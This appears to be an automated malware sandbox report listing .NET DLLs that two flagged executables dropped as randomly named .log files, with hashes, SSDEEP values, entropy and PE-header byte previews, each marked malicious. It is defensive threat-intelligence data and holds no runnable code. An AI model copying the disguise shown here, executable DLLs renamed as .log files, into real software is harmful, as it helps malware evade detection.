SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XIqsTrtm.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XKvsXEeS.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\XNoagVJo.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XSrHlKtI.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XaxKhNmp.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XoYqWopG.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YAYBVQfz.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YGvPWYoG.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YRuAcrMJ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\YgrJBoPX.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YlzzsoEA.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZdSRXoeS.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aCjqmULK.log

Download File

Process:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\aIOINqAk.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aMLzISkQ.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aQaJCENj.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\agdAFVnw.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\anISgrcX.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aykSTqhz.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bBmjeBfL.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\bCZRjEXC.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bQoBpJni.log

Download File

Process:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bjaIeUfz.log

Download File

